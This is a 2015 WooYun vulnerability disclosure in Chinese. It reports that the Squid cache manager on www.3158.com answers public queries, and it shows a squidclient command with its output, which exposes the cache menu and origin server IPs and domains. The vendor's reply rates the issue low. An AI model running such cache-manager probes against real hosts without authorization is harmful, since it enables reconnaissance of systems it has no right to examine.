当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0112929

漏洞标题:财富中国某服务配置不当导致信息泄露

相关厂商:财富中国

漏洞作者: depycode

提交时间:2015-05-18 14:20

修复时间:2015-07-06 17:46

公开时间:2015-07-06 17:46

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-18: 细节已通知厂商并且等待厂商处理中
2015-05-22: 厂商已经确认,细节仅向厂商公开
2015-06-01: 细节向核心白帽子及相关领域专家公开
2015-06-11: 细节向普通白帽子公开
2015-06-21: 细节向实习白帽子公开
2015-07-06: 细节向公众公开

简要描述:

RT..

详细说明:

E:\>squidclient.exe -h www.3158.com -p 80 mgr:
HTTP/1.1 200 OK
Server: PowerCDN/4.1
Mime-Version: 1.0
Date: Fri, 08 May 2015 10:22:56 GMT
Content-Type: text/plain
Expires: Fri, 08 May 2015 10:22:56 GMT
Last-Modified: Fri, 08 May 2015 10:22:56 GMT
X-Cache: MISS from dg193.powercdn.com
Via: 1.1 dg193.powercdn.com (PowerCDN/4.1)
Connection: close
index Cache Manager Interface public
menu Cache Manager Menu public
offline_toggle Toggle offline_mode setting hidden
shutdown Shut Down the Squid Process hidden
reconfigure Reconfigure Squid hidden
rotate Rotate Squid Logs hidden
cached_ssl_cert Statistic of cached generated ssl certificates public
pconn Persistent Connection Utilization Histograms public
mem Memory Utilization public
squidaio_counts Async IO Function Counters public
diskd DISKD Stats public
config Current Squid Configuration hidden
client_list Cache Client List public
comm_epoll_incoming comm_incoming() stats public
ipcache IP Cache Stats and Contents public
fqdncache FQDN Cache Stats and Contents public
idns Internal DNS Statistics public
redirector URL Redirector Stats public
store_id StoreId helper Stats public
basicauthenticator Basic User Authenticator Stats public
external_acl External ACL stats public
http_headers HTTP Header Statistics public
info General Runtime Information public
service_times Service Times (Percentiles) public
filedescriptors Process Filedescriptor Allocation public
objects All Cache Objects public
vm_objects In-Memory and In-Transit Objects public
io Server-side network read() size histograms public
counters Traffic and Resource Counters public
peer_select Peer Selection Algorithms public
digest_stats Cache Digest and ICP blob public
5min 5 Minute Average of Counters public
60min 60 Minute Average of Counters public
utilization Cache Utilization public
histograms Full Histogram Counts public
active_requests Client-side Active Requests public
username_cache Active Cached Usernames public
openfd_objects Objects with Swapout files open public
store_digest Store Digest public
store_log_tags Histogram of store.log tags public
storedir Store Directory Stats public
store_io Store IO Interface Stats public
store_check_cachable_stats storeCheckCachable() Stats public
refresh Refresh Algorithm Statistics public
delay Delay Pool Levels public
forward Request Forwarding Statistics public
cbdata Callback Data Registry Contents public
events Event Queue public
asndb AS Number Database public
carp CARP information public
userhash peer userhash information public
sourcehash peer sourcehash information public
server_list Peer Cache Statistics public


server_list:


截取部分

Parent     : n_40_6_664_4182_163177128170_80
Host : 163.177.128.170/80/0
Flags : no-query no-netdb-exchange originserver connection-auth=auto
Address[0] : 163.177.128.170
Status : Up
FETCHES : 234
OPEN CONNS : 0
AVG RTT : 0 msec
IGNORED : 0 0%
DOMAIN LIST: .3158mj.com
keep-alive ratio: 100%
Parent : n_40_50_153_4446_2111476211_80
Host : 211.147.6.211/80/0
Flags : no-query no-netdb-exchange originserver connection-auth=auto
Address[0] : 211.147.6.211
Status : Up
FETCHES : 43
OPEN CONNS : 0
AVG RTT : 0 msec
IGNORED : 0 0%
DOMAIN LIST: .2307.com
keep-alive ratio: 100%
Parent : n_40_201_1147_4805_2111476197_80
Host : 211.147.6.197/80/0
Flags : no-query no-netdb-exchange originserver connection-auth=auto
Address[0] : 211.147.6.197
Status : Up
FETCHES : 10
OPEN CONNS : 0
AVG RTT : 0 msec
IGNORED : 0 0%
DOMAIN LIST: .yanglemei.com
keep-alive ratio: 0%
Parent : n_40_6_130_201_2111005285_80
Host : 211.100.52.85/80/0
Flags : no-query no-netdb-exchange originserver connection-auth=auto
Address[0] : 211.100.52.85
Status : Up
FETCHES : 0
OPEN CONNS : 0
AVG RTT : 0 msec
IGNORED : 0 0%
DOMAIN LIST: .518958.com
keep-alive ratio: 0%


111111.jpg


漏洞证明:

111111.jpg

修复方案:

版权声明:转载请注明来源 depycode@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2015-05-22 17:45

厂商回复:

基本无公害!还是感谢关心!

最新状态:

2015-05-22:还有我们的主站是www.3158.cn !!!com域名虽然也是我们的,但目前来说不是主站,而且在服务器和程序上没有任何关联!!!